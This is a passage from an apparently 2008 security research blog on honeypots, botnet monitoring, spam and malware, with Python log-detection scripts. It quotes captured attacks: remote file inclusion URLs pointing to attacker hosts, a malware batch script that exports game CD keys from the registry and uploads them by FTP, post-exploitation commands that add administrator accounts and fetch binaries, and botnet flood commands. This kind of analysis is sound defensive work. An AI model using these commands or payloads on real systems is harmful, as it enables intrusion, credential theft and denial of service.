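    '192.0.2.44 - - [12/Dec/2008:09:00:00 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for name, info in scan_report(SAMPLE_LOG).items():
        print(name, sorted(info["sources"]), sorted(info["user_agents"]))
```

Matching on the path suffix rather than a fixed prefix is deliberate, since the scans above try /roundcube/, /mail/ and /webmail/ in turn; a 404 in the status column is the usual outcome on a server that does not run Roundcube, and a 200 on these paths is the line worth reacting to.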


SSH Brute Force Attacks

— Posted by zeroq @ 21:59 - 31 Oct, 2008

I have been playing around with a simple SSH honeypot implementation in order to learn a little more about brute force attacks on SSH servers. The project has been running for some time now and I want to present some of the data collected so far.

In a period of two months from July to September of this year a total of 143 different attackers tried to compromise the honeypot. In my opinion this is not really much, considering the fake SSH daemon was listening on a few thousand IP addresses.

The 143 attackers tried 9150 different usernames, the top 10 is presented in the following picture.

For the different usernames a total of 25973 different passwords were tried. The top 10 is presented in the next picture.

That's it for now. I didn't have the time yet to further investigate the collected data, but I will post some more information as soon as I have more time.



Infiltrator v0.3

— Posted by zeroq @ 15:12 - 20 Oct, 2008

Some time has passed since I blogged about the infiltrator script, but here is an updated version.
I don't have a changelog, but this release fixes some bugs and provides some minor updates. It should be possible to monitor HTTP POST-based botnets as well.

Have fun: infiltrator-v0.3

For those that don't know what infiltrator is: it is a Python script for quick and dirty botnet monitoring. No fancy GUI, no extra comfort, just plain text =)



Amun Bug

— Posted by zeroq @ 09:32 - 10 Oct, 2008

I found a small bug today. I forgot to set the download identifier for two linkbot shellcodes. There is already a fixed version in the SVN.

If you want to fix it yourself change the following two lines in shellcode_mgr_core.py:
(they start with dlident = instead of what is mentioned below)

line 1047 should read:
self.resultSet['dlident'] = ...

line 1070 should also start this way:
self.resultSet['dlident'] = ...



Rishi v0.9.6

— Posted by zeroq @ 09:48 - 08 Oct, 2008

And another update to rishi. Some bugs have been fixed, so it should run better now. Files are available at http://sourceforge.net/projects/rishi/
Changelog looks like this:

Rishi v0.9.6:
        - fixed return values of the mysql module
        - modified JOIN regex check
        - modified queue sizes
        - free unused variables when possible



Amun v0.1.6

— Posted by zeroq @ 15:17 - 07 Oct, 2008

Finally. It took quite a while this time, because I thought getting internet at home should be quick and easy... well, I am still waiting =) However, the next release is ready for download, either as tar.gz from sourceforge (http://sourceforge.net/project/showfiles.php?group_id=221628) or via subversion from sourceforge.

ChangeLog looks like this:

Changes in v0.1.6:
        - fixed submit-cwsandbox timeout issue
        - fixed submit-cwsandbox result url parsing
        - modified ftp download module
        - modified for-loops in shellcodemanager
        - modified range to xrange
        - added submit-joebox module thanx to the author of joebox and lukas from glasblog
        - added ipconfig command emulation



Botnet Playing Pennergame.de

— Posted by zeroq @ 11:36 - 04 Sep, 2008

We recently came across an irc botnet with mostly german zombie machines. Our botnet detection sensor at RWTH Aachen University detected one infected host. We are currently monitoring the botnet using our infiltrator software and noticed about 188 different bots in the channel.

Several binaries have been advertised in the channel so far:

  • d7867796764fe9095d114f1a02b2662e IE.exe
  • 4fcc736149b8ac46ee31d3763544e058 anita.exe
  • 1059b51a5e4a702895060f8a4c8a8261 mof.exe

According to the traffic captured from the infected host and the sandbox reports of the binaries, the bot herder uses the botnet to play pennergame.de, some kind of browser game...

We see a lot of T-Online, Arcor, and einsundeins customers being infected and interestingly according to the country abbreviation a lot of hosts from Enugu (Nigeria).



SPAM and X-Mailer

— Posted by zeroq @ 13:34 - 03 Sep, 2008

We are currently analysing several thousand spam messages for research purposes and also doing some statistics. The one thing I like is the graph about which X-Mailers were used for sending the spam. We have analysed 136.635 spam emails and here is what we discovered:

So if you want to stop more than 70 percent of spam in the internet, just go ahead and drop mails from outlook express =)



Morfeus Fucking Scanner

— Posted by zeroq @ 12:00 - 20 Aug, 2008

I am currently playing around with a web server emulation module for Amun, to catch remote file inclusion attacks on certain web applications. That is how I stumbled across the user agent "Morfeus Fucking Scanner". It seems to be a piece of software which scans web servers for vulnerable services, like Mambo or Cacti. The following URLs were tried at our honeypots:

/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/

The file 1.gif, which the attacker tries to include every time, is a simple PHP script, just echoing some wise text:

echo ("Morfeus hacked you");

No need to get excited, though =)
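Requests like the ones above are easy to pick out of ordinary web-server logs: the tell-tale sign is a query parameter whose value is itself an absolute URL. The following is an added example, not part of the original post or of Amun; the log lines are constructed (three reuse paths from the list above, the client addresses, timestamps and the last two requests are made up).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample web-server log lines (Common Log Format plus referer and
# user agent). The three scanner requests reuse paths from the list above; the
# client addresses, timestamps and the last two requests are made up.
SAMPLE_LOG = """\
10.0.0.7 - - [20/Aug/2008:11:58:01 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/ HTTP/1.1" 404 210 "-" "Morfeus Fucking Scanner"
10.0.0.7 - - [20/Aug/2008:11:58:02 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/ HTTP/1.1" 404 210 "-" "Morfeus Fucking Scanner"
10.0.0.7 - - [20/Aug/2008:11:58:03 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 210 "-" "Morfeus Fucking Scanner"
192.0.2.5 - - [20/Aug/2008:12:01:44 +0200] "GET /index.php?id=42&page=http://203.206.169.35/1.gif?/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [20/Aug/2008:12:02:10 +0200] "GET /index.php?id=42&page=/local/page.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)
# A query parameter whose value is itself an absolute URL is the signature of
# a remote file inclusion probe: the scanner hopes the script will include it.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SCANNER_AGENT = "Morfeus Fucking Scanner"


def rfi_parameters(target):
    """Return the (name, value) pairs of `target` whose value is a remote URL."""
    query = urlsplit(target).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def detect_rfi_probes(log_text):
    """One finding per request that carries an RFI payload or the scanner's UA."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        hits = rfi_parameters(m["target"])
        known_scanner = m["agent"] == SCANNER_AGENT
        if hits or known_scanner:
            findings.append({
                "client": m["client"],
                "path": urlsplit(m["target"]).path,
                "params": hits,
                "scanner": known_scanner,
            })
    return findings


def summarize(findings):
    """Per client: how many probes, and which hosts it tried to include from."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["client"], {"requests": 0, "hosts": set()})
        entry["requests"] += 1
        for _, url in f["params"]:
            entry["hosts"].add(urlsplit(url).netloc)
    return summary


if __name__ == "__main__":
    for client, info in summarize(detect_rfi_probes(SAMPLE_LOG)).items():
        print(client, info["requests"], sorted(info["hosts"]))
```

The parameter check is independent of the user agent, so a scanner that changes its name is still caught as long as it keeps sending remote URLs as parameter values.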



Still Alive

— Posted by zeroq @ 09:11 - 11 Aug, 2008
Yep, I am still alive. I moved from Aachen to Mannheim, thus I didn't have much time for writing. The next release of Amun is almost ready, this time with only small changes, but thanks to Lukas from glasblog and the guy(s) behind Joebox Security there is a new submission module for the Joebox. Furthermore I had to adjust the submit-cwsandbox module as the result URL seems to have changed a bit.

Rishi v0.9.5

— Posted by zeroq @ 07:39 - 18 Jun, 2008

Finally the next Rishi release is available. It took a while to integrate the privacy features; another collector method is also available, and the whole project moved to SourceForge.

The last changes:

Rishi v0.9.5:
  • fixed exception handling in pypcap collector
  • fixed queue handling in worker class
  • added inclusion of external cc server list
Rishi v0.9.4:
  • fixed changing to working directory before startup
  • added pypcap collector method
  • added privacy features (logging at certain points, anonymization)
  • added checking nickname against uncommon bi-grams
  • added logfile rotation
  • increased default worker number to four
  • moved update url to configuration file

 



Malware Extracts CD Keys

— Posted by zeroq @ 10:20 - 09 Jun, 2008

I have been monitoring an IRC based botnet for a few days now, which spreads via instant messaging. It uses the common trick with image links and text like "hey is this you on this photo...". The interesting thing is, it's a German botnet, as messages are sent in German and the servers hosting the following malware file are located in Germany.

The last update link "hxxp://xxx.myphotos.cc/image.php?=" points to a file 149K in size with an MD5 hash of "bc800528e106916fe8a0cd4d91dc0cc4". To get some more information we ran the file on a VMware host and captured the network traffic.

This binary does not update the IRC bot, but tries to retrieve its commands via HTTP from a host named "httpbot.xxx.cx". This host redirects the request to the following URL: "hxxp://xxx.bo.funpic.de/x.php?=/cmd.bat". The server sends the cmd.bat file in reply, which contains the following commands:

if exist %TEMP%\k3y (goto started) else (goto run)
:run
set data=%computername%_%random%.txt
echo tmp_dbg>> %TEMP%\k3y
ECHO ===========>> %data%
ECHO   CD KEYs>> %data%
ECHO ===========>> %data%
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Electronic Arts\Electronic Arts\Crysis\ergc" crysis
type crysis >> %data%
del crysis
reg export "HKEY_LOCAL_MACHINE\Software\Unreal Technology\Installed Apps\UT2003" ut03
type ut03 >> %data%
del ut03
reg export "HKEY_LOCAL_MACHINE\Software\Unreal Technology\Installed Apps\UT2004" ut04
type ut04 >> %data%
del ut04
reg export "HKEY_LOCAL_MACHINE\Software\id\Quake 4" q4
type qt >> %data%
del q4
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\VirtualDJ" vdj
type vdj >> %data%
del vdj
Echo Open xxx-xxx.de 21>>a
Echo web6>>a
Echo 123456>>a
Echo Binary >>a
Echo cd /httpdocs/log >>a
Echo PUT %data%>>a
Echo Quit>>a
Echo ftp.exe -s:a>>r.bat
ECHO del a>>r.bat
ECHO del %data% >>r.bat
ECHO del r.bat>>r.bat
r.bat

As one can see from the commands, the malware tries to extract CD keys from the Windows registry and upload them to an FTP server. Currently it looks for keys from the following software: Quake 4, Crysis, Unreal Tournament 2003 and 2004, and Virtual DJ.



Amun v0.1.5

— Posted by zeroq @ 07:59 - 04 Jun, 2008

The new release is available here. Changes are as follows:

Changes in v0.1.5:

  • fixed reload config missing return value
  • fixed connectback config_dict variable not global error
  • added shellcode decoder for alpha2 zero tolerance shellcode
  • added new vulnerability module for HP OpenView exploit
  • added submit-cwsandbox module
  • modified remove bindport from list after sending local quit
  • modified remove ftp data port from list after sending local quit


First Hit IBM Lotus Sametime

— Posted by zeroq @ 11:30 - 29 May, 2008

Yesterday our honeynet was hit by an attacker exploiting the IBM Lotus Sametime buffer overflow. The service is running on TCP port 1533 and is vulnerable to oversized URLs (http://securityvulns.com/news/IBM/LotusSametime.html).

I set up the analyzer module of Amun to listen on this port for incoming requests and yesterday we got the first results:

exploit 85.214.79.120:3384 -> xxx.xxx.51.84:1533
(ANALYZER Vulnerability: cbacks://85.214.79.120:5559/)

Fortunately the shellcode is already recognized. The attacker injected shellcode causing the victim to connect back to the attacker and spawn a shell.


More on Black Energy Bot

— Posted by zeroq @ 11:21 - 29 May, 2008

I modified my infiltrator script to monitor POST based HTTP bots. I am currently monitoring the Black Energy botnet I found yesterday.

Commands have changed since the last visit:

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.igra3k.ru,www.moneymakergroup.com,www.mycashforum.com,www.dreamteammoney.com,
www.invest-n-surf.net,www.autosurfnavigator.com,www.vip-globalmarketingsolutions.com#6#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#wait#8#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.moneymakergroup.com,www.mycashforum.com,www.dreamteammoney.com,
www.invest-n-surf.net,www.autosurfnavigator.com,www.vip-globalmarketingsolutions.com#6#']

base64: ['10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.russiancasino.ru,taxi-ufa.ru#8#']



FDOS BEnergy

— Posted by zeroq @ 14:31 - 28 May, 2008

I recently stumbled across some interesting log lines in our quarantine webserver logs:

15:49:19.348824 IP xxx.xxx.101.24.3989 > 124.217.249.240.80
POST /h0tbe1by/stat.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: activeprotect.cn
Content-Length: 38
Pragma: no-cache

id=xMAHAJANVA_33E529BB&build_id=2F5C73

This looks pretty interesting, a POST to a funny directory ... strange. Now let's see what the server replied:

15:49:19.729110 IP 124.217.249.240.80 > xxx.xxx.101.24.3989
HTTP/1.1 200 OK
Date: Fri, 23 May 2008 13:49:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html

MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI2Zsb29kIGh0dHAgd3d3LjE0ZGF5cy1oaXRzLX
N1cmYubmV0LG1vbmV5bWFrZXJncm91cC5jb20sd3d3LnRhbGtnb2xkLmNvbSBmb3J1bS9p
bmRleC5waHAjOCM=
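The reply body is plain base64; once decoded it has the same shape as the commands listed in the follow-up post above: a semicolon-separated block of numbers, the command, and a number, all separated by "#". The parser below is an added example, not part of the original post or of the infiltrator script; it takes the captured reply as shown above (line breaks removed) and a second reply constructed here from the "wait" command seen later. What the eleven numbers mean is not known from the capture, so they are kept as an anonymous tuple.

```python
import base64
import binascii

# The reply body captured above, with the line breaks from the log viewer removed.
CAPTURED_REPLY = (
    "MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI2Zsb29kIGh0dHAgd3d3LjE0ZGF5cy1oaXRzLX"
    "N1cmYubmV0LG1vbmV5bWFrZXJncm91cC5jb20sd3d3LnRhbGtnb2xkLmNvbSBmb3J1bS9p"
    "bmRleC5waHAjOCM="
)
# A second reply, constructed here by encoding the "wait" command the same
# botnet handed out later (see the follow-up post above).
WAIT_REPLY = base64.b64encode(b"10;2000;10;0;0;30;100;3;20;1000;2000#wait#8#").decode()


def decode_reply(body):
    """Base64-decode a reply body; None if it is not clean base64 ASCII text."""
    compact = "".join(body.split())          # drop whitespace and line wrapping
    try:
        return base64.b64decode(compact, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_command(text):
    """Split '<config>#<command>#<interval>#' into a dict.

    The eleven numbers in the config block are kept as an anonymous tuple:
    their meaning is not known from the capture, so nothing is guessed.
    """
    fields = text.split("#")
    if len(fields) < 3:
        raise ValueError("expected config#command#interval#, got %r" % text)
    config = tuple(int(x) for x in fields[0].split(";"))
    words = fields[1].split()
    if not words:
        raise ValueError("empty command field in %r" % text)
    result = {"config": config, "command": words[0], "args": words[1:],
              "interval": int(fields[2]), "flood_type": None,
              "targets": [], "extra": []}
    # flood <type> <comma-separated target list> [extra words, e.g. a path]
    if words[0] == "flood" and len(words) >= 3:
        result["flood_type"] = words[1]
        result["targets"] = [t for t in words[2].split(",") if t]
        result["extra"] = words[3:]
    return result


def parse_reply(body):
    """Decode and parse one C2 reply; None if the body does not decode."""
    text = decode_reply(body)
    return None if text is None else parse_command(text)


if __name__ == "__main__":
    for body in (CAPTURED_REPLY, WAIT_REPLY):
        cmd = parse_reply(body)
        print(cmd["command"], cmd["interval"], cmd["targets"])
```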


HP OpenView Exploit

— Posted by zeroq @ 09:01 - 14 May, 2008

Yesterday evening our Amun honeypots got hit by an attacker exploiting the HP OpenView vulnerability. The attack came from a host located in the Netherlands.

The shellcode is about 1.5 KByte in size and is encoded using ALPHA 2, an alphanumeric shellcode encoding mechanism, just like the one from the milw0rm exploit linked above.

Amun does not yet simulate that vulnerability but had the port added to the analyzer module, thus I received all necessary information.



Amun v0.1.4

— Posted by zeroq @ 17:52 - 13 May, 2008

Next release is ready to download. Changelog looks as follows:

Changes in v0.1.4:

  • fixed ftp download module to send requests one by one
  • fixed manual analysis option to work again after last update (missing parameter)
  • added new vulnerability module for Helix server v11.0.1 exploit
  • modified ftp shellcode decoder to find all download files
  • modified submit modules to python new-class style
  • modified logfiles to rotate at midnight
  • added blocking of successful exploit ips
  • added queue of last stored binaries to reduce disk io when checking for already stored files
  • added initial stage to iis vulnerability
  • moved broken download checking out of submit modules


Something about SPAM

— Posted by zeroq @ 15:04 - 25 Apr, 2008

Today, we were able to identify an infected system validating email addresses before sending out a few SPAM messages. This behaviour is probably nothing new, but I haven't seen it before.

So what the infected machine does: it connects to a single mailserver, in this case Yahoo Mail, and initiates the email sending process. That means it sends MAIL FROM with a random address followed by 3-7 random recipients (RCPT TO). For each recipient the mailserver returns either OK or not. Afterwards the infected host sends a RSET to reset the mail transaction and starts from the beginning.

Thus, traffic looks like this:

  • -> MAIL FROM:<Juana_Blanco@stny.rr.com>
  • -> RCPT TO:<dbrant_07@yahoo.com>
  • <- 250 recipient <dbrant_07@yahoo.com> ok
  • -> RCPT TO:<dbpoet1969@yahoo.com>
  • <- 250 recipient <dbpoet1969@yahoo.com> ok
  • [...]
  • -> RSET
  • <- 250 reset ok
  • -> MAIL FROM:<OdessaHutchins89@catcha.com>
  • [...]
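The pattern is visible in the dialogue itself: envelopes that are opened with MAIL FROM, probed with a few RCPT TO and then thrown away with RSET, never reaching DATA. The following is an added example, not part of the original post; it runs over a constructed transcript in the same "->"/"<-" notation (placeholder addresses) and flags a session when reset envelopes dominate.

```python
import re

# Constructed SMTP dialogue in the "->" (client) / "<-" (server) notation used
# above. All addresses are placeholders. Envelopes 1 and 2 follow the pattern
# from the post (MAIL FROM, a few RCPT TO, RSET, never DATA); envelope 3 is a
# normal delivery for comparison.
SAMPLE_SESSION = """\
-> MAIL FROM:<sender1@example.net>
<- 250 sender <sender1@example.net> ok
-> RCPT TO:<user1@example.com>
<- 250 recipient <user1@example.com> ok
-> RCPT TO:<user2@example.com>
<- 550 recipient <user2@example.com> not found
-> RCPT TO:<user3@example.com>
<- 250 recipient <user3@example.com> ok
-> RSET
<- 250 reset ok
-> MAIL FROM:<sender2@example.org>
<- 250 sender <sender2@example.org> ok
-> RCPT TO:<user4@example.com>
<- 250 recipient <user4@example.com> ok
-> RCPT TO:<user5@example.com>
<- 550 recipient <user5@example.com> not found
-> RSET
<- 250 reset ok
-> MAIL FROM:<sender3@example.net>
<- 250 sender <sender3@example.net> ok
-> RCPT TO:<user1@example.com>
<- 250 recipient <user1@example.com> ok
-> DATA
<- 354 go ahead
-> .
<- 250 ok message queued
"""

ADDR_RE = re.compile(r"<([^<>]*)>")
CODE_RE = re.compile(r"^(\d{3})")


def analyze_session(transcript, min_probes=2, min_ratio=0.5):
    """Classify each envelope as a probe (RSET before DATA) or a delivery.

    A session is flagged when at least `min_probes` envelopes were reset and
    probes make up at least `min_ratio` of all envelopes.
    """
    probes, messages = [], []
    envelope, last_verb, pending = None, None, None
    for raw in transcript.splitlines():
        line = raw.strip()
        if line.startswith("->"):
            cmd = line[2:].strip()
            last_verb = cmd.split(":")[0].split()[0].upper() if cmd else ""
            m = ADDR_RE.search(cmd)
            addr = m.group(1) if m else None
            if last_verb == "MAIL":
                envelope = {"sender": addr, "accepted": [], "rejected": []}
            elif last_verb == "RCPT":
                pending = addr
            elif last_verb == "RSET" and envelope is not None:
                probes.append(envelope)      # reset without ever sending
                envelope = None
            elif last_verb == "DATA" and envelope is not None:
                messages.append(envelope)    # a real delivery attempt
                envelope = None
        elif line.startswith("<-") and last_verb == "RCPT":
            m = CODE_RE.match(line[2:].strip())
            if m and envelope is not None and pending is not None:
                bucket = "accepted" if m.group(1) == "250" else "rejected"
                envelope[bucket].append(pending)
                pending = None
    total = len(probes) + len(messages)
    ratio = len(probes) / total if total else 0.0
    return {
        "probes": probes,
        "messages": messages,
        # addresses the server confirmed inside probe envelopes: the ones the
        # bot learned are valid without sending a single message
        "harvested": [a for e in probes for a in e["accepted"]],
        "rejected": [a for e in probes for a in e["rejected"]],
        "probe_ratio": ratio,
        "suspicious": len(probes) >= min_probes and ratio >= min_ratio,
    }
```

On a real mailserver the same logic can be fed per-connection from the SMTP log; the harvested list is what the bot took away from the session.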

Amun v0.1.3

— Posted by zeroq @ 12:39 - 12 Apr, 2008

And here comes another one =) This time more bug fixes and less new features. Get it here.

Changes in v0.1.3:

  • fixed tftp download packet ACK reply to correct port
  • fixed setting download identifier for tftp downloads
  • fixed properly checking blocked hosts
  • fixed double closing of bindports, http, connback, and ftp downloads
  • added initial stage to tivoli vulnerability
  • added drop privilege function to run as non-root user
  • added extended logging option
  • added new shellemulation class to handle bindport and connectbackshell
  • added new logfile for shellemulator
  • modified submission modules to receive notification if file already exists
  • modified bindport to submit shellcode to shellcode manager 


Amun v0.1.2

— Posted by zeroq @ 17:37 - 25 Mar, 2008

The next Amun release is now available. Things that have changed:

Changes in v0.1.2:
    - fixed delete existing connection function
    - fixed amun_config_parser to parse empty variables and set to none
    - fixed amun_config_parser to allow comment of modules with '#'
    - added submit-anubis module
    - added different options for defining the ip(s) to bind to
    - added nat ip option for ftp downloads
    - added new plain ftp download regex found in symantec exploit
    - added support for multiple file ftp downloads
    - added change directory functionality for bindport and connectbackshell
    - added change to working directory before startup
    - added handle_expt() to bindport module
    - modified default reply size to 64
    - modified vuln modules which need bigger default reply size
    - modified call of functions to provide all parameters
    - modified handle_expt() in ftp_download from close to pass



Tales from a botnet

— Posted by zeroq @ 10:25 - 18 Mar, 2008

Lately at a botnet far far away ...

PRIVMSG #a#s#b :u have bots ?
PRIVMSG #a#s#b :yes
PRIVMSG #a#s#b :more then 1k
PRIVMSG #a#s#b :haha
PRIVMSG #a#s#b :lol
PRIVMSG #a#s#b :nice

PRIVMSG #a#s#b :right now on my sever 1458 bot
PRIVMSG #a#s#b :ghand ara bhenchod
PRIVMSG #a#s#b :Current local users: 170 Max: 535
PRIVMSG #a#s#b :Current global users: 170 Max: 535
PRIVMSG #a#s#b :is my server
PRIVMSG #a#s#b :170 :P
PRIVMSG #a#s#b :what source have ?

PRIVMSG #a#s#b :lol only 170
PRIVMSG #a#s#b :PRivate
PRIVMSG #a#s#b :give me your src
PRIVMSG #a#s#b ::D

PRIVMSG #a#s#b :Why ?
PRIVMSG #a#s#b :this is private
PRIVMSG #a#s#b :i buy in 10 $
PRIVMSG #a#s#b :haha lol
PRIVMSG #a#s#b :give me your src end i will give yo root :D

PRIVMSG #a#s#b :i dont need root.
PRIVMSG #a#s#b :oks
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :help me

PRIVMSG #a#s#b :y u laugh
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :for un src
PRIVMSG #a#s#b ::D
PRIVMSG #a#s#b :where are u from
PRIVMSG #a#s#b :?

PRIVMSG #a#s#b :malaysian
PRIVMSG #a#s#b :aha
PRIVMSG #a#s#b :u
PRIVMSG #a#s#b :oki
PRIVMSG #a#s#b :albania

PRIVMSG #a#s#b :where r u from
PRIVMSG #a#s#b :albania
PRIVMSG #a#s#b :man

PRIVMSG #a#s#b :ok
PRIVMSG #a#s#b :yes
PRIVMSG #a#s#b :this src what is ?
PRIVMSG #a#s#b :is
PRIVMSG #a#s#b :your
PRIVMSG #a#s#b :exe ?
PRIVMSG #a#s#b :give links
PRIVMSG #a#s#b :hey
PRIVMSG #a#s#b :u are here
PRIVMSG #a#s#b :give your exe



Necessity is the mother of invention.

— Posted by zeroq @ 19:36 - 24 Feb, 2008

I was in need of some pcap files of IRC bot infected machines; unfortunately they are not so easy to get. Thus, I decided to write a little tool which automatically generates pcap traces for submitted samples.

The tool is divided into two parts. The first part is a little Windows TCP server, capable of receiving binary data and executing it. This part runs in a virtual machine running Windows as operating system. The second part is a short Python script running on a Linux host outside the virtual machine. It takes binary files from a directory and transmits them one by one to the virtual machine. While the virtual host runs the submitted binary, the Python script captures the network traffic and constructs the pcap file. After a predefined timeout, the Python script sends a revert-to-snapshot command to the virtual machine and sends the next binary.

As a result I have a little tool to automatically construct pcap files of infected machines running for a configurable time. Currently I am constructing pcaps of malware running 5 minutes on the virtual machine.



Symantec Vulnerability

— Posted by zeroq @ 10:40 - 22 Feb, 2008

The vulnerability in the Symantec Anti-Virus/Client Security software listening on port 2967 is actively exploited, as we can determine from the Amun honeypot log files.

Different hosts frequently exploit our emulated vulnerability and inject shellcode which instructs the client to connect back to the attacker, presenting a shell for further commands:

exploit 222.133.xxx.xxx:1786 -> xxx.xxx.129.106:2967 (SYMANTEC: cbacks://222.133.xxx.xxx:6000/)

Commands entered in the shell instruct the victim to download additional files via FTP:

net stop sharedaccess
net user guest active:yes
net user guest !!!@@@QQQaaa
net localgroup administrators guest /add
net user sb$ sb /add
net localgroup administrators sb$ /add
echo open 124.234.xxx.xxx>>ftp.txt
echo sb>>ftp.txt
echo sb>>ftp.txt
echo bin>>ftp.txt
echo get sx.exe>>ftp.txt
echo get qq.exe>>ftp.txt
echo get 3389.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
sx.exe
qq.exe
3389.exe -o 3389
3389.exe -r


Amun v0.1.1

— Posted by zeroq @ 09:42 - 18 Feb, 2008

The next Amun release is now available. Things that have changed:

Changes in v0.1.1:
- fixed amun request handler to close finished connections
- fixed submit-md5 module to write in binary mode
- fixed connectbackshell loading shellcodemanager correctly
- fixed connectbackshell replying with prompt
- fixed bindport replying with prompt
- fixed http download to accept few bytes if download already started
- added new unencrypted bindshellcode used to exploit the VERITAS vulnerability
- added new plain tftp download regex found in asn1 exploit
- added new vuln module for port 2380
- added ftp port range configuration
- added debug option logging local ip exploits
- added new stage shellcode for vuln-pnp module
- added minimum shellcode size for vuln-upnp to avoid emule
- added logging module for syslog
- added logging module for email
- added utility for quick shellcode checking (checkCode.py)
- updated regular expression for ftp plaintext detection
- modified bindport socket close behaviour
- modified default timeout values in amun.conf
- modified error message for not connected transports
- modified http shellcode to allow urls without port


No Words

— Posted by zeroq @ 10:11 - 23 Jan, 2008


HTTP Spam Bot

— Posted by zeroq @ 15:19 - 16 Jan, 2008

And once again I stumbled across an interesting bot. This one tends to send out spam. The infected host contacts a webserver running on 208.72.xxx.xxx to receive its commands. The GET request looks as follows: /outtask/urlTask8_c_3_no_sbl.txt?id=5A7766D4AEC8C19E051A.

The server replies with a list of different URLs like this:
10
602|http://x/outtask/tasks/tasks_task_602_letter_1192013242.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
635|http://x/outtask/tasks/tasks_task_635_letter_1192013254.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
636|http://x/outtask/tasks/tasks_task_636_letter_1192013259.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
637|http://x/outtask/tasks/tasks_task_637_letter_1192013263.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
641|http://x/outtask/tasks/tasks_task_641_letter_1192013267.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|
642|http://x/outtask/tasks/tasks_task_642_letter_1192013271.txt|http://x:8008/cgi-bin/get.cgi|http://x/report2.cgi|1|


The first URLs probably refer to the text the spam message should contain. As the server wasn't reachable anymore, I could not verify this. However, if you take a look at the second URL in each line, you receive some interesting results:
info@davidnau.com xxx.xxx.xxx.xxx, xxx.xxx.xxx.xxx, xxx.xxx.xxx.xxx
